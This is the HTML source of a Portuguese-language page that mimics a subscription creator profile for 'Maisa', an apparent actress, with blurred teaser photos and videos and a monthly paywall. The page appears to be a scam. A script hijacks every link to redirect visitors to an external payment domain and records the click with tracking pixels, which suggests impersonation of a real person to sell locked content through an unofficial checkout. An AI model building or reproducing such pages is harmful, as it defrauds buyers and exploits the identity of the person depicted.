<!DOCTYPE html><html lang="pt-br"><head>
    <meta charset="UTF-8">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&amp;display=swap" rel="stylesheet">
    <style>
      body {
        font-family: "Inter", sans-serif;
      }
    </style>
    <link rel="icon" type="image/png" href="images/logo.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Privacy | Maisa</title>
    <script async="" src="js/fbevents.js"></script><script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="css/style.css">

    <!-- Meta Pixel Code -->
    <script>
      !(function (f, b, e, v, n, t, s) {
        if (f.fbq) return;
        n = f.fbq = function () {
          n.callMethod
            ? n.callMethod.apply(n, arguments)
            : n.queue.push(arguments);
        };
        if (!f._fbq) f._fbq = n;
        n.push = n;
        n.loaded = !0;
        n.version = "2.0";
        n.queue = [];
        t = b.createElement(e);
        t.async = !0;
        t.src = v;
        s = b.getElementsByTagName(e)[0];
        s.parentNode.insertBefore(t, s);
      })(
        window,
        document,
        "script",
        "https://connect.facebook.net/en_US/fbevents.js"
      );
      fbq("init", "1787277062034213");
      fbq("track", "PageView");
    </script>
    <noscript><img
        height="1"
        width="1"
        style="display: none"
        src="https://www.facebook.com/tr?id=1787277062034213&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Meta Pixel Code -->

    <script>
      window.pixelId = "674a410a2459f70ea07b4f6a";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script><script async="" defer="" src="js/pixel.js"></script>

    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
  </head>

  <body class="bg-gray-100">
    <!-- Navbar -->
    <nav class="bg-white shadow-md">
      <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div class="flex justify-center items-center h-16">
          <img class="h-9 w-auto" src="images/privacy.svg" alt="Logo">
        </div>
      </div>
    </nav>
    <!-- <script src="https://www.byeblocks.com/api/loader.js" publicId="pid-c21f1aa1-8687-11ef-8833-17dfe52a2935" publicKey="pk-f6ddf551-8456-11ef-af6e-13c9b08ceb96"></script><script src="https://www.byeblocks.com/api/exec.js"></script> -->
<!-- Banner e Perfil -->
<div class="relative max-w-3xl mx-auto rounded-bottom-3">
  <!-- Imagem de Banner -->
  <img class="w-full h-64 object-cover" src="images/banner.webp" alt="Banner">

  <!-- Gradiente sobre a imagem -->
  <div class="absolute inset-0 bg-gradient-to-t from-black via-transparent to-transparent"></div>

  <!-- Posts e Likes no Banner -->
  <div class="absolute bottom-4 right-4 text-white">
    <span class="block">82 posts • 86k likes</span>
  </div>

  <!-- Ícone de Perfil -->
  <div class="absolute -bottom-16 left-6">
    <img class="h-24 w-24 rounded-full border-4 border-white object-cover" src="images/profile.webp" alt="Perfil">
  </div>
</div>

<!-- Seção de Nome e @ -->
<div class="max-w-3xl mx-auto mt-16 px-6">
  <!-- Nome e @ ao lado do perfil -->
  <div>
    <div class="flex items-center">
      <h2 class="text-lg font-bold text-black">Maisa</h2>
      <img class="h-5 w-5 ml-2" src="images/badge-check.svg" alt="Verificado">
    </div>
    <p class="text-sm text-gray-600">@maisa</p>
  </div>
</div>

<!-- Seção de Detalhes do Perfil -->
<div class="max-w-3xl mx-auto bg-white p-6 rounded-lg shadow-lg mt-4">
  <!-- Texto com efeito de blur -->
  <p id="profile-details" class="text-gray-800 text-sm blurred">
    Atriz ✨
  </p>

  <!-- Botão "Ver Mais" -->
  <button id="toggleButton" class="mt-2 text-orange-500 hover:text-orange-600 focus:outline-none">
    Ver mais
  </button>

  <!-- Redes Sociais -->
  <div class="flex space-x-3 mt-4">
    <!-- Ícone customizado -->
    <a href="#pay" class="icon-circle">
      <img src="images/x.png" alt="X">
    </a>

    <!-- Instagram -->
    <a href="#pay" class="icon-circle">
      <img src="images/instagram.png" alt="Instagram">
    </a>

    <!-- TikTok -->
    <a href="#pay" class="icon-circle">
      <img src="images/tiktok.png" alt="TikTok">
    </a>
  </div>

  <!-- Seção de Assinaturas -->
  <br>
  <h6 class="title-subscribe">ASSINATURAS</h6>

  <!-- Botão de Assinatura -->
  <a href="#pay" target="_blank" class="subscribe-btn mt-2">
    <span>Assinar (1 mês)</span>
    <span>R$ 19,90 / mês</span>
  </a>

  <!-- Estatísticas de posts, fotos e vídeos -->
  <div class="stats">
    <p>
      82 posts • 49 fotos • 33 vídeos
    </p>
  </div>

  

  
    <div class="image-container mt-4">
      <img src="images/photo.webp" alt="Imagem">
    </div>
    

  <script>
    const videoElement = document.getElementById("myVideo");
    videoElement.addEventListener("click", function () {
      if (videoElement.muted) {
        videoElement.muted = false;
      } else {
        videoElement.muted = true;
      }
    });
  </script>

   
  <!-- Imagem com marca d'água -->
  <div class="image-container mt-4">
    <div class="blur">
      <img src="images/5.webp" alt="Imagem">
    </div>
    <!-- Marca d'água -->
    <img class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
  </div>
  
  <!-- Imagem com marca d'água -->
  <div class="image-container mt-4">
    <div class="blur">
      <img src="images/6.webp" alt="Imagem">
    </div>
    <!-- Marca d'água -->
    <img class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
  </div>
  
  <!-- Imagem com marca d'água -->
  <div class="image-container mt-4">
    <div class="blur">
      <img src="images/7.webp" alt="Imagem">
    </div>
    <!-- Marca d'água -->
    <img class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
  </div>
    
  
  
    
      <div class="video-container mt-4">
        <div class="blur">
          <video autoplay="" muted="" loop="">
            <source src="media/01.mp4" type="video/mp4">
            Seu navegador não suporta vídeos HTML5.
          </video>
        </div>
        <!-- Marca d'água -->
        <img class="watermark" src="images/white-logo.png" alt="Marca d'água">
      </div>
    
  

  <style>
    .payment-overlay {
      position: fixed;
      top: 0;
      left: -100%;
      width: 100%;
      height: 100%;
      background-color: white;
      z-index: 1000;
      transition: left 0.5s ease-in-out;
    }
    .payment-overlay.active {
      left: 0;
    }
    .payment-iframe {
      border: none;
      width: 100%;
      height: 100%;
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      z-index: 1000;
    }
  </style>

  <div id="paymentOverlay" class="payment-overlay">
    <iframe id="pagSeguroIframe" src="" frameborder="0" allowfullscreen="" class="payment-iframe"></iframe>
  </div>

  <div class="stats">
    <p>
      82 posts • 49 fotos • 33 vídeos
    </p>
  </div>

  <footer>
    <a href="#pay">🔒 DESBLOQUEAR TODOS OS CONTEÚDOS 🔒</a>
  </footer>

  <script>
    const paymentButton = document.getElementById("paymentButton");
    const paymentOverlay = document.getElementById("paymentOverlay");
    const pagSeguroIframe = document.getElementById("pagSeguroIframe");

    function buildUrlWithUTM(baseUrl) {
      const utmData = JSON.parse(localStorage.getItem("myCustomUTMData"));
      const url = new URL(baseUrl, window.location.origin);

      if (utmData) {
        for (const key in utmData) {
          if (utmData.hasOwnProperty(key)) {
            url.searchParams.set(key, utmData[key]);
          }
        }
      }

      return url.toString();
    }

    const pagSeguroUrl = buildUrlWithUTM(
      "https://pay.ment-oficial.online/v7R0gln0QJBZVr9"
    );

    // pagSeguroIframe.src = pagSeguroUrl;

    document.querySelectorAll("a[href]").forEach((a) => {
      a.addEventListener("click", (e) => {
        e.preventDefault();
        try {
          fbq("track", "InitiateCheckout");
        } catch {}

        window.location.href = "https://pay.ment-oficial.online/PyE2Zya6mm2ZqRb";
        // paymentOverlay.classList.add("active");
      });
    });

    paymentButton.addEventListener("click", () => {
      try {
        fbq("track", "InitiateCheckout");
      } catch {}
      paymentOverlay.classList.add("active");
    });
  </script>

  <script>
    const toggleButton = document.getElementById("toggleButton");
    const profileDetails = document.getElementById("profile-details");

    toggleButton.addEventListener("click", function () {
      if (profileDetails.classList.contains("blurred")) {
        profileDetails.classList.remove("blurred");
        toggleButton.textContent = "Ver menos";
      } else {
        profileDetails.classList.add("blurred");
        toggleButton.textContent = "Ver mais";
      }
    });
  </script>
</div>
  

</body></html>